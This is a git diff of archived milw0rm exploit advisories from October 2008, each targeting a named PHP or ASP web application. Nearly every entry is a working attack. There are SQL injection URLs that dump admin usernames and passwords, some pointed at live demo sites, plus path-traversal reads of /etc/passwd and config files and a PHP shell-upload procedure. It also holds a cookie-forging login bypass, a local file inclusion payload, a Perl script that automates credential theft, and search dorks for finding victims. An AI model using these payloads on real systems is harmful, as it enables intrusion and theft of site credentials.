SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + S N N N A A K K E S T E A A M M M + SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M +===================================================SNAKES TEAM==================================================== ++ = += AJ Forced Matrix Script Remote SQL Injection Vulnerability + ++ = +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: yassine_enp :::ALGERIAN HaCkEr::: = = + = = + = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = + = = + = = :::::Mail: e1np@hotmail.com::::::: = = + = = + = = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::= = + = nome de script :rss_reader + = + ======================================yassine_enp=================================== + + +Exploit(1): +******** + +www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin-- + +Demo +________ + +http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin-- + + + + + +=================================================================================================================== + +Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members + +=================================================================================================================== + + ::::e1np@Hotmail.CoM:::: + +# milw0rm.com [2008-10-24] diff --git a/platforms/php/webapps/6830.txt b/platforms/php/webapps/6830.txt index fda3085a2..c58a4790f 100755 --- a/platforms/php/webapps/6830.txt +++ b/platforms/php/webapps/6830.txt 
@@ -1,21 +1,21 @@ -//Title - NEPT Image Uploader shell upload - -//Vendor - newearthpt.freehostia.com - -//Version - 1.0 - -//Status - vendor has been notified - -//Author - Dentrasi - -//Description - -It is possible to upload a php script to the remote site. - - -1. Select a php file for upload -2. Select it for upload, and tamperdata the request -3. Change the Content-Type from 'application/octet-stream' to 'image/jpeg' -4. If the link provided gives a 404, add 'upload/' before the file name - -# milw0rm.com [2008-10-24] +//Title - NEPT Image Uploader shell upload + +//Vendor - newearthpt.freehostia.com + +//Version - 1.0 + +//Status - vendor has been notified + +//Author - Dentrasi + +//Description + +It is possible to upload a php script to the remote site. + + +1. Select a php file for upload +2. Select it for upload, and tamperdata the request +3. Change the Content-Type from 'application/octet-stream' to 'image/jpeg' +4. If the link provided gives a 404, add 'upload/' before the file name + +# milw0rm.com [2008-10-24] diff --git a/platforms/php/webapps/6833.txt b/platforms/php/webapps/6833.txt index 4ce2ab081..8de2a6fe4 100755 --- a/platforms/php/webapps/6833.txt +++ b/platforms/php/webapps/6833.txt 
@@ -1,72 +1,72 @@ - ___________________________________________________________________________________________________________ - | _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ | - | | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ | - | | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / | - | | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / | - | | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ | - | | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ | - | | / \/ | - | | / _____________________________________________________________________________________________________| - | | / / .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):. | - | |/ /______________________________________________________________________________________________________| - | v / Discoverd By: 0xFFFFFF . Main THX: ALLAH | - | / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team | - | / Mail: admin(at)white-hacker[dot]com . | - |/ Country: Algeria . | - v___________________________________________________________________________________________________________| - | Publication info :. | - |___________________________________________________________________________________________________________| - | Date: 23-10-2008 . Method : [*] GET [ ] POST | - | Content: Vulnerability . Register Globals : [ ] ON [*] OFF | - | Type: SQL-INJ,XSS,LFD . Magic quotes : [*] ON [ ] OFF | - | Application: PHPdaily . Risk: [*] High [ ] medium [ ] Low | - | Venedor site: http://phpdaily.self-reliance.be/ . | - | Version: N/A . | - | -------------------------------------------------- . | - | Impact: Exploring Database . | - | Run unauthorized JavaScript . | - | Local File Download . | - | -------------------------------------------------- . | - | Exploit: Available . 
| - | Fix: N/A . | - |___________________________________________________________________________________________________________| - | Description :. | - |___________________________________________________________________________________________________________| - | | - | After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of | - | vulnerabilities. | - | | - | Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not | - | properly verified, a simple user can easily get sensitive information from the database by injecting | - | SQL Queries. | - | | - | Also through "download_file.php" page via the input "fichierwe" any user can download any local file. | - | Furthermore, through "add_prest_date.php" page there is the ability of XSS. | - | | - | ......................................................................................................... | - | | - | Requirement | - | You have to connect as a simple user | - | | - | 1. SQL injection Exploit : | - | [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8# | - | [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns]) | - | [Site]prest_detail.php?prev=[SQL-INJ] | - | [Site]mod_prest_date.php?prev=list&id=[SQL-INJ] | - | | - | 2. Local File Download Exploit : | - | [Site]download_file.php?fichier=../include/connect.php | - | [Site]download_file.php?fichier=../../../../../../etc/passwd | - | | - | 3. XSS Exploit: | - | [Site]add_prest_date.php?date="> | - |___________________________________________________________________________________________________________| - | Notice :. | - |___________________________________________________________________________________________________________| - | These publications are published for educational purpose thus the author will be not responsible | - | for any damage. 
| - |___________________________________________________________________________________________________________| - \ © WHITE-HACKER All contents © 2008. All rights reserved. | - \____________________________________________________________| - -# milw0rm.com [2008-10-24] + ___________________________________________________________________________________________________________ + | _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ | + | | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ | + | | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / | + | | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / | + | | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ | + | | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ | + | | / \/ | + | | / _____________________________________________________________________________________________________| + | | / / .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):. | + | |/ /______________________________________________________________________________________________________| + | v / Discoverd By: 0xFFFFFF . Main THX: ALLAH | + | / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team | + | / Mail: admin(at)white-hacker[dot]com . | + |/ Country: Algeria . | + v___________________________________________________________________________________________________________| + | Publication info :. | + |___________________________________________________________________________________________________________| + | Date: 23-10-2008 . Method : [*] GET [ ] POST | + | Content: Vulnerability . Register Globals : [ ] ON [*] OFF | + | Type: SQL-INJ,XSS,LFD . Magic quotes : [*] ON [ ] OFF | + | Application: PHPdaily . Risk: [*] High [ ] medium [ ] Low | + | Venedor site: http://phpdaily.self-reliance.be/ . | + | Version: N/A . 
| + | -------------------------------------------------- . | + | Impact: Exploring Database . | + | Run unauthorized JavaScript . | + | Local File Download . | + | -------------------------------------------------- . | + | Exploit: Available . | + | Fix: N/A . | + |___________________________________________________________________________________________________________| + | Description :. | + |___________________________________________________________________________________________________________| + | | + | After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of | + | vulnerabilities. | + | | + | Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not | + | properly verified, a simple user can easily get sensitive information from the database by injecting | + | SQL Queries. | + | | + | Also through "download_file.php" page via the input "fichierwe" any user can download any local file. | + | Furthermore, through "add_prest_date.php" page there is the ability of XSS. | + | | + | ......................................................................................................... | + | | + | Requirement | + | You have to connect as a simple user | + | | + | 1. SQL injection Exploit : | + | [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8# | + | [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns]) | + | [Site]prest_detail.php?prev=[SQL-INJ] | + | [Site]mod_prest_date.php?prev=list&id=[SQL-INJ] | + | | + | 2. Local File Download Exploit : | + | [Site]download_file.php?fichier=../include/connect.php | + | [Site]download_file.php?fichier=../../../../../../etc/passwd | + | | + | 3. XSS Exploit: | + | [Site]add_prest_date.php?date="> | + |___________________________________________________________________________________________________________| + | Notice :. 
| + |___________________________________________________________________________________________________________| + | These publications are published for educational purpose thus the author will be not responsible | + | for any damage. | + |___________________________________________________________________________________________________________| + \ © WHITE-HACKER All contents © 2008. All rights reserved. | + \____________________________________________________________| + +# milw0rm.com [2008-10-24] diff --git a/platforms/php/webapps/6835.txt b/platforms/php/webapps/6835.txt index b6a52eb70..6340fc55c 100755 --- a/platforms/php/webapps/6835.txt +++ b/platforms/php/webapps/6835.txt 
@@ -1,58 +1,58 @@ - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - + + - + BuzzyWall Remote File Disclosure Vulnerability + - + + - + Discovered by b3hz4d + - + + - + WwW.DeltaHacking.Net + - + + - + + - + + - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - - - -AUTHOR : b3hz4d -DATE : 25 oct 2008 -SITE : WwW.DeltaHacking.Net - - -##################################################### - -APPLICATION : BuzzyWall -DOWNLOAD : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip -VENDOR : http://www.buzzywall.com - -##################################################### - - -[+] vuln : ./download.php - - -$file_name = $_GET['id'] - - $file_path = $weburl."wallpapers/full/".$file_name; - - . - - . - - . - - . - - readfile("$file_path"); - - - -[+] Exploit : http://victim.com/download.php?id=../../config.php - - - -############################################################################## - -# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net # - -############################################################################## - -# milw0rm.com [2008-10-24] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + + + BuzzyWall Remote File Disclosure Vulnerability + + + + + + Discovered by b3hz4d + + + + + + WwW.DeltaHacking.Net + + + + + + + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + +AUTHOR : b3hz4d +DATE : 25 oct 2008 +SITE : WwW.DeltaHacking.Net + + +##################################################### + +APPLICATION : BuzzyWall +DOWNLOAD : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip +VENDOR : http://www.buzzywall.com + +##################################################### + + +[+] vuln : ./download.php + + +$file_name = $_GET['id'] + + $file_path = $weburl."wallpapers/full/".$file_name; + + . + + . + + . + + . 
+ + readfile("$file_path"); + + + +[+] Exploit : http://victim.com/download.php?id=../../config.php + + + +############################################################################## + +# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net # + +############################################################################## + +# milw0rm.com [2008-10-24] diff --git a/platforms/php/webapps/6836.txt b/platforms/php/webapps/6836.txt index f0eca8af7..619315dcf 100755 --- a/platforms/php/webapps/6836.txt +++ b/platforms/php/webapps/6836.txt @@ -1,14 +1,14 @@ -Tlnews 2.2 Admin Login Bypass (via Cookie) -Found by X0r - EvolutionTeaM -Email: evolutionteam.x0[at]gmail[dot]com - -Cms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip - -Exploit: javascript:document.cookie = "tlNews_login=admin; content=admin; -path=/" - -Beby y0ur system g0t d0wn :P - -// X0r - EvolutionTeaM - -# milw0rm.com [2008-10-25] +Tlnews 2.2 Admin Login Bypass (via Cookie) +Found by X0r - EvolutionTeaM +Email: evolutionteam.x0[at]gmail[dot]com + +Cms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip + +Exploit: javascript:document.cookie = "tlNews_login=admin; content=admin; +path=/" + +Beby y0ur system g0t d0wn :P + +// X0r - EvolutionTeaM + +# milw0rm.com [2008-10-25] diff --git a/platforms/php/webapps/6837.txt b/platforms/php/webapps/6837.txt index 9d1198f09..b4f7bc8b4 100755 --- a/platforms/php/webapps/6837.txt +++ b/platforms/php/webapps/6837.txt 
@@ -1,46 +1,46 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -[~] Script: KasraCMS -[~] Language : PHP -[~] WebSite: http://kasracms.com -[~] affected File: index.php -[~] Type : Commercial -[~] Report-Date : 25/10/2008 - - ---[ DoRK ]-- -intext:"2007-2008 Kasra ICT" - - ---[ Founder ]-- -G4N0K - - ---[ Exploit ]-- -[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT -0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- -[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT -0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- - - ---[ L!ve ]-- -http://kasracms.com/index.php?cont=-63 UNION ALL SELECT -0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- -http://kasracms.com/index.php?shme=-63 UNION ALL SELECT -0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- - - ---[ Greetz ]-- -[~] ALLAH -[~] Tornado2800 -[~] Hussain-X - -//ALLAH, forgimme... 
- --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -EoX --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -# milw0rm.com [2008-10-25] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +[~] Script: KasraCMS +[~] Language : PHP +[~] WebSite: http://kasracms.com +[~] affected File: index.php +[~] Type : Commercial +[~] Report-Date : 25/10/2008 + + +--[ DoRK ]-- +intext:"2007-2008 Kasra ICT" + + +--[ Founder ]-- +G4N0K + + +--[ Exploit ]-- +[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT +0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- +[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT +0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- + + +--[ L!ve ]-- +http://kasracms.com/index.php?cont=-63 UNION ALL SELECT +0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- +http://kasracms.com/index.php?shme=-63 UNION ALL SELECT +0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- + + +--[ Greetz ]-- +[~] ALLAH +[~] Tornado2800 +[~] Hussain-X + +//ALLAH, forgimme... + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +EoX +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +# milw0rm.com [2008-10-25] diff --git a/platforms/php/webapps/6839.txt b/platforms/php/webapps/6839.txt index 5741d78e3..7cf1d8eee 100755 --- a/platforms/php/webapps/6839.txt +++ b/platforms/php/webapps/6839.txt 
@@ -1,43 +1,43 @@ -|___________________________________________________ -| -| Classified Auctions (gotourl.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------- Hussin X ------------------ -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| -| script : http://www.pozscripts.com/index.php -| -| DorK : inurl:gotourl.php?id= -|___________________________________________________ - -Exploit: -________ - - -www.[target].com/Script/gotourl.php?id=-30+union+select+concat(version(),user())-- - - -Demo: -________ - -http://www.singwebs.com/auction_demo/gotourl.php?id=-30+union+select+concat(version(),user())-- - - - -________________( Greetz )_____________________ - _____ ____ __ __ _ ____ -|_ _| | _ \ \ \ / / / \ / ___| - | | | |_) | \ V / / _ \ | | _ - | | | _ < | | / ___ \ | |_| | - |_| |_| \_\ |_| /_/ \_\ \____| -_______________________________________________ - -# milw0rm.com [2008-10-26] +|___________________________________________________ +| +| Classified Auctions (gotourl.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------- Hussin X ------------------ +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| +| script : http://www.pozscripts.com/index.php +| +| DorK : inurl:gotourl.php?id= +|___________________________________________________ + +Exploit: +________ + + +www.[target].com/Script/gotourl.php?id=-30+union+select+concat(version(),user())-- + + +Demo: +________ + +http://www.singwebs.com/auction_demo/gotourl.php?id=-30+union+select+concat(version(),user())-- + + + +________________( Greetz )_____________________ + _____ ____ __ __ _ ____ +|_ _| | _ \ \ \ / / / \ / ___| + | | | |_) | \ V / / _ \ | | _ + | | | _ < | | / ___ \ | |_| | + 
|_| |_| \_\ |_| /_/ \_\ \____| +_______________________________________________ + +# milw0rm.com [2008-10-26] diff --git a/platforms/php/webapps/6842.txt b/platforms/php/webapps/6842.txt index 5ec7abfce..b84f41fd2 100755 --- a/platforms/php/webapps/6842.txt +++ b/platforms/php/webapps/6842.txt 
@@ -1,29 +1,29 @@ -------------------------------------------------------------------- -WordPress Media Holder (id) Sql injetion vulnerability! -------------------------------------------------------------------- -------------------------------------------------------------------- -Author: boom3rang -Greetz: H!tM@N - KHG - chs - redc00de! -Site : www.khg-crew.ws - [Kosova Hackers Group!] -------------------------------------------------------------------- - - -------------------------------------------------------------------- -Dork: mediaHolder.php?id -------------------------------------------------------------------- -Exp: http://localHost/mediaHolder.php?id=[exploit] -------------------------------------------------------------------- -exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()-- -------------------------------------------------------------------- -liveDemo: -http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()-- -------------------------------------------------------------------- - - -------------------------------------------------------------------- -Proud 2 be Albanian -Proud 2 be Muslim -United States of Albania -------------------------------------------------------------------- - -# milw0rm.com [2008-10-26] +------------------------------------------------------------------- +WordPress Media Holder (id) Sql injetion vulnerability! +------------------------------------------------------------------- +------------------------------------------------------------------- +Author: boom3rang +Greetz: H!tM@N - KHG - chs - redc00de! +Site : www.khg-crew.ws - [Kosova Hackers Group!] 
+------------------------------------------------------------------- + + +------------------------------------------------------------------- +Dork: mediaHolder.php?id +------------------------------------------------------------------- +Exp: http://localHost/mediaHolder.php?id=[exploit] +------------------------------------------------------------------- +exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()-- +------------------------------------------------------------------- +liveDemo: +http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()-- +------------------------------------------------------------------- + + +------------------------------------------------------------------- +Proud 2 be Albanian +Proud 2 be Muslim +United States of Albania +------------------------------------------------------------------- + +# milw0rm.com [2008-10-26] diff --git a/platforms/php/webapps/6843.txt b/platforms/php/webapps/6843.txt index 1a206d26f..c3bcdff87 100755 --- a/platforms/php/webapps/6843.txt +++ b/platforms/php/webapps/6843.txt 
@@ -1,26 +1,25 @@ - -================================================================================== - SFS Forum (forum.php id) Remote SQL Injection Vulnerability -================================================================================== - __ __ __ - / / / /_ _______/ /__ __ __ - / /_/ / / / / ___/ / _ \/ / / / - / __ / /_/ / / / / __/ /_/ / - /_/ /_/\__,_/_/ /_/\___/\__, / - /____/ -================================================================================== ----------------------------------------------------------------------------------- -Website script: http://www.scripts-for-sites.info/index.php ----------------------------------------------------------------------------------- -Exploit: http://localHost/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/* ----------------------------------------------------------------------------------- -LiveDemo: -http://www.turnkeyzone.com/demos/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/* ----------------------------------------------------------------------------------- - -================================================================================== -Greetz : Boom3rang -Special Thx : Darckc0de -================================================================================== - -# milw0rm.com [2008-10-26] +================================================================================== + SFS Forum (forum.php id) Remote SQL Injection Vulnerability +================================================================================== + __ __ __ + / / / /_ _______/ /__ __ __ + / /_/ / / / / ___/ / _ \/ / / / + / __ / /_/ / / / / __/ /_/ / + /_/ /_/\__,_/_/ /_/\___/\__, / + /____/ +================================================================================== +---------------------------------------------------------------------------------- +Website script: 
http://www.scripts-for-sites.info/index.php +---------------------------------------------------------------------------------- +Exploit: http://localHost/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/* +---------------------------------------------------------------------------------- +LiveDemo: +http://www.turnkeyzone.com/demos/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/* +---------------------------------------------------------------------------------- + +================================================================================== +Greetz : Boom3rang +Special Thx : Darckc0de +================================================================================== + +# milw0rm.com [2008-10-26] diff --git a/platforms/php/webapps/6844.pl b/platforms/php/webapps/6844.pl index fb56ffc99..66a263cb1 100755 --- a/platforms/php/webapps/6844.pl +++ b/platforms/php/webapps/6844.pl 
@@ -1,58 +1,58 @@ -#!/usr/bin/perl - -#***********************************************************************************# -# Remote SQL Injection Exploit # -#***********************************************************************************# -# Software : MyForum 1.3 # -# Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip # -# Date : 27 October 2008 -# Author : Vrs-hCk # -# Contact : d00r[at]telkom[dot]net # -#***********************************************************************************# -# Greetz # -#***********************************************************************************# -# MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org # -# Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, # -# loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, # -# chawanua, bL4Ck_3n91n3, R3V4N_B4ST4RD, bryan_ae1, dkk ... c0li.m0de.0n !!! # -#***********************************************************************************# - -use HTTP::Request; -use LWP::UserAgent; - -$bug = "lecture.php?id=1"; -$sql = "+union+select+1,concat(0x21,pseudo,0x3a,mdp,0x21),3,4,5,6,7,8+from+forum_user+where+id=1--"; - -print "\n ******************************************\n"; -print " * MyForum 1.3 Remote SQL Exploit *\n"; -print " * For get Admin or User Login *\n"; -print " * Coded by Vrs-hCk *\n"; -print " ******************************************\n\n"; - -if (@ARGV != 1) { &help; exit(); } - -sub help(){ - print " [?] 
Use : perl $0 www.target.com\n"; - print " perl $0 www.target.com/path\n\n"; -} - -if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; } -print " [SQL] Exploiting ...\n\n"; - -my $injection = $target.$bug.$sql; -my $request = HTTP::Request->new(GET=>$injection); -my $useragent = LWP::UserAgent->new(); -$useragent->timeout(10); -my $response = $useragent->request($request); -if ($response->is_success) { - my $res = $response->content; - if ($res =~ m/!(.*):(.*)!/g) { - my ($username,$passwd) = ($1,$2); - print " [target] $target \n"; - print " [loginx] $username:$passwd \n\n"; - } - else { print " [SQL] Error, Fail to get admin login.\n\n"; } -} -else { print " [SQL] Error, ".$response->status_line."\n\n"; } - -# milw0rm.com [2008-10-26] +#!/usr/bin/perl + +#***********************************************************************************# +# Remote SQL Injection Exploit # +#***********************************************************************************# +# Software : MyForum 1.3 # +# Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip # +# Date : 27 October 2008 +# Author : Vrs-hCk # +# Contact : d00r[at]telkom[dot]net # +#***********************************************************************************# +# Greetz # +#***********************************************************************************# +# MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org # +# Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, # +# loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, # +# chawanua, bL4Ck_3n91n3, R3V4N_B4ST4RD, bryan_ae1, dkk ... c0li.m0de.0n !!! 
# +#***********************************************************************************# + +use HTTP::Request; +use LWP::UserAgent; + +$bug = "lecture.php?id=1"; +$sql = "+union+select+1,concat(0x21,pseudo,0x3a,mdp,0x21),3,4,5,6,7,8+from+forum_user+where+id=1--"; + +print "\n ******************************************\n"; +print " * MyForum 1.3 Remote SQL Exploit *\n"; +print " * For get Admin or User Login *\n"; +print " * Coded by Vrs-hCk *\n"; +print " ******************************************\n\n"; + +if (@ARGV != 1) { &help; exit(); } + +sub help(){ + print " [?] Use : perl $0 www.target.com\n"; + print " perl $0 www.target.com/path\n\n"; +} + +if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; } +print " [SQL] Exploiting ...\n\n"; + +my $injection = $target.$bug.$sql; +my $request = HTTP::Request->new(GET=>$injection); +my $useragent = LWP::UserAgent->new(); +$useragent->timeout(10); +my $response = $useragent->request($request); +if ($response->is_success) { + my $res = $response->content; + if ($res =~ m/!(.*):(.*)!/g) { + my ($username,$passwd) = ($1,$2); + print " [target] $target \n"; + print " [loginx] $username:$passwd \n\n"; + } + else { print " [SQL] Error, Fail to get admin login.\n\n"; } +} +else { print " [SQL] Error, ".$response->status_line."\n\n"; } + +# milw0rm.com [2008-10-26] diff --git a/platforms/php/webapps/6846.txt b/platforms/php/webapps/6846.txt index b76da47aa..d78bef512 100755 --- a/platforms/php/webapps/6846.txt +++ b/platforms/php/webapps/6846.txt 
@@ -1,38 +1,38 @@ -[o]------------------------------------------------------------------------------------[x] - | Local File Inclusion Vulnerability | -[o]------------------------------------------------------------------------------------[o] - | Software : MyForum 1.3 | - | Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip | | - | Date : 27 October 2008 | - | Author : Vrs-hCk | - | Contact : d00r[at]telkom[dot]net | -[o]------------------------------------------------------------------------------------[o] - -[»] Vulnerable - - ./admin/centre.php - - 3: if (isset($padmin)) - 4: { - 5: - 6: $fichier = "padmin/".$padmin.".php"; - 7: - 8: if (file_exists($fichier)) - 9: { - 10: include ($fichier); - 11: } - -[»] Exploit - - http://[site]/[path]/admin/centre.php?padmin=[LFI]%00 - -[o]------------------------------------------------------------------------------------[x] - | Greetz | -[o]------------------------------------------------------------------------------------[o] - | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | - | Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, | - | loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, | - | chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!! 
| -[o]------------------------------------------------------------------------------------[o] - -# milw0rm.com [2008-10-27] +[o]------------------------------------------------------------------------------------[x] + | Local File Inclusion Vulnerability | +[o]------------------------------------------------------------------------------------[o] + | Software : MyForum 1.3 | + | Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip | | + | Date : 27 October 2008 | + | Author : Vrs-hCk | + | Contact : d00r[at]telkom[dot]net | +[o]------------------------------------------------------------------------------------[o] + +[»] Vulnerable + + ./admin/centre.php + + 3: if (isset($padmin)) + 4: { + 5: + 6: $fichier = "padmin/".$padmin.".php"; + 7: + 8: if (file_exists($fichier)) + 9: { + 10: include ($fichier); + 11: } + +[»] Exploit + + http://[site]/[path]/admin/centre.php?padmin=[LFI]%00 + +[o]------------------------------------------------------------------------------------[x] + | Greetz | +[o]------------------------------------------------------------------------------------[o] + | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | + | Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, | + | loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, | + | chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!! | +[o]------------------------------------------------------------------------------------[o] + +# milw0rm.com [2008-10-27] diff --git a/platforms/php/webapps/6847.txt b/platforms/php/webapps/6847.txt index 378a21d79..e5e200684 100755 --- a/platforms/php/webapps/6847.txt +++ b/platforms/php/webapps/6847.txt 
@@ -1,44 +1,44 @@ -########################## www.BugReport.ir ####################################### -# -# AmnPardaz Security Research Team -# -# Title: Persia BME E-Catalogue SQL Injection Vulnerability -# Vendor: http://www.persiabme.com/products/ -# Impact: High -# Fix: N/A -# Original Advisory: http://www.bugreport.ir/index_55.htm -################################################################################### - -#################### -1. Description: -#################### - Persia BME E-Catalogue is a powerful engine which provides webmasters with advanced abilities of controlling their website. The system has a free style multi level Menu to add a company's products or services. - -#################### -2. Vulnerability: -#################### - Input passed to the "q" parameter in "search.aspx" is not properly sanitised before being used in SQL queries. -This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. -Its possible to obtain user's plain text password by this vulnerability. - - - -#################### -3. Exploits/POCs: -#################### - http://www.example.com/fa/qsearch/search.asp?action=search&q=BugReport.ir' or 1=(select top 1 username+':'+password from tbluser)-- - -#################### -4. Solution: -#################### - Edit the source code to ensure that inputs are properly sanitized. - -#################### -5. 
